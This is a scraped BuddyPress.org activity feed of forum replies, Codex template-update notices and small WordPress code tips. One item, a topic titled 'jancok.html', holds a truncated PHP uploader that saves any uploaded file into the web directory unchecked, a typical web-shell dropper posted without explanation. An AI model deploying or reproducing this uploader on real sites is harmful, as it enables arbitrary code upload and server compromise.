-
Henry Wright replied to the topic Bp Profile Search Incompatibility in the forum How-to & Troubleshooting 9 years, 7 months ago
Try asking on the BP Profile Search support forum. Support is very good.
-
@mercime wrote a new post on the site BuddyPress.org 9 years, 7 months ago
BuddyPress 2.7.0 Release Candidate 2 is now available for testing. Please download the 2.7.0-rc2 zip or get a copy via our Subversion repository.
This is our last chance to find any bugs that slipped through Re […]
-
Merida replied to the topic [Resolved] user page tab with a link to another site in the forum Miscellaneous 9 years, 7 months ago
Thank you very much! All ok.
-
Hugo Ashmore updated the Updating Custom Themes For New Functionality page, on the BuddyPress Codex 9 years, 7 months ago
This section is your guide to BuddyPress theme updates, by version release.
From time to time Buddypress creates new functionality that requires templates and markup adjustments, adds new JavaScript scripting […]
-
David Cavins updated the Template Updates 2.7 page, on the BuddyPress Codex 9 years, 7 months ago
In BuddyPress 2.7 we introduce some new features that specifically require template adjustment.
These changes are of importance for theme developers who may have overloaded the templates to the themes directory […]
-
Hugo Ashmore updated the Template Updates 2.1 page, on the BuddyPress Codex 9 years, 7 months ago
BuddyPress 2.1 introduced three new features that specifically require template updates in order that they function.
@mentions InterfacePassword Strength MeterActivity Show Filters@mentions Auto […]
-
Merida replied to the topic [Resolved] user page tab with a link to another site in the forum Miscellaneous 9 years, 7 months ago
Default I did not have the file bp-custom.php
I created this file in /home/user/site/wp-content/plugins/bp-custom.php
And then in the bp-custom.php file (it was empty), add your code.
-
sn315on started the topic jancok.html in the forum Installing BuddyPress 9 years, 7 months ago
<?php
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);echo"<center><b>Done ==>…[Read more]
-
Hugo Ashmore updated the Template Updates 2.7 page, on the BuddyPress Codex 9 years, 7 months ago
In BuddyPress 2.7 we introduce some new features that specifically require template adjustment.
These changes are of importance for theme developers who may have overloaded the templates to the themes […]
-
Merida replied to the topic [Resolved] user page tab with a link to another site in the forum Miscellaneous 9 years, 7 months ago
Thanks for the reply. I did everything according to your instructions.
but when you open the site gives an error
Parse error: syntax error, unexpected '}', expecting end of file in /home/user..../site/wp-content/plugins/bp-custom.php on line 18how to fix? thank you in advance.
-
Merida started the topic [Resolved] user page tab with a link to another site in the forum Miscellaneous 9 years, 7 months ago
Hello. Do not tell me how to add your user page tab with a link to another site?
screen fastened.
http://oi67.tinypic.com/snhzsh.jpg
thank you in advance. -
Paul Wong-Gibbs replied to the topic [Resolved] Allow html in xprofile fields in the forum How-to & Troubleshooting 9 years, 7 months ago
I would strongly advise AGAINST remove KSES filters. It’s there for your protection.
-
Sagar Gupta's profile was updated 9 years, 7 months ago
-
@mercime updated the Template Updates 2.7 page, on the BuddyPress Codex 9 years, 7 months ago
In BuddyPress 2.7 we introduce some new features that specifically require template adjustment.
These changes are of importance for theme developers who may have overloaded the templates to the themes […]
-
Paul Wong-Gibbs replied to the topic Toolbar Bubble in the forum How-to & Troubleshooting 9 years, 7 months ago
Not via the UI. 🙁 But you can write some code! Add this to your functions.php file in your theme, it should work even if you add it on a newline at the very end of a file:
remove_action( 'admin_bar_menu', 'bp_members_admin_bar_notifications_menu', 90 ); -
Paul Wong-Gibbs replied to the topic How to load specific theme template for all BP pages? in the forum How-to & Troubleshooting 9 years, 7 months ago
@r083r7 Hi. You’re right that BuddyPress loads page.php as its default page wrapper template. The list near the top of https://codex.buddypress.org/themes/theme-compatibility-1-7/template-hierarchy/ shows the entire template hierarchy. Adding a buddypress.php file to your theme should have it load that template.
This file should be in the root of…[Read more]
-
Paul Wong-Gibbs replied to the topic How to hide / remove the General tab under Settings in the forum How-to & Troubleshooting 9 years, 7 months ago
I saw the bug report you’ve filed, Dan, but I’ve not had time to look into it.
-
Kishores replied to the topic IS IT POSSIBLE : BuddyPres + Job_Board + Instant_Messenger in the forum Installing BuddyPress 9 years, 7 months ago
Here is plugin for Job Board.
Instant_Messenger: https://shop.opentuteplus.com/downloads/buddypress-instant-messaging/
-
Slava Abakumov replied to the topic An option to not allow members to post in group in the forum How-to & Troubleshooting 9 years, 7 months ago
Better to prevent spam users to register at all. There are a lot of plugins, that help with it.
I use WP-SpamShield successfully on a BuddyPress site. -
Slava Abakumov replied to the topic An option to not allow members to post in group in the forum How-to & Troubleshooting 9 years, 7 months ago
There is not such publicly available plugin.
But that’s an interesting idea to consider for plugins-dev. - Load More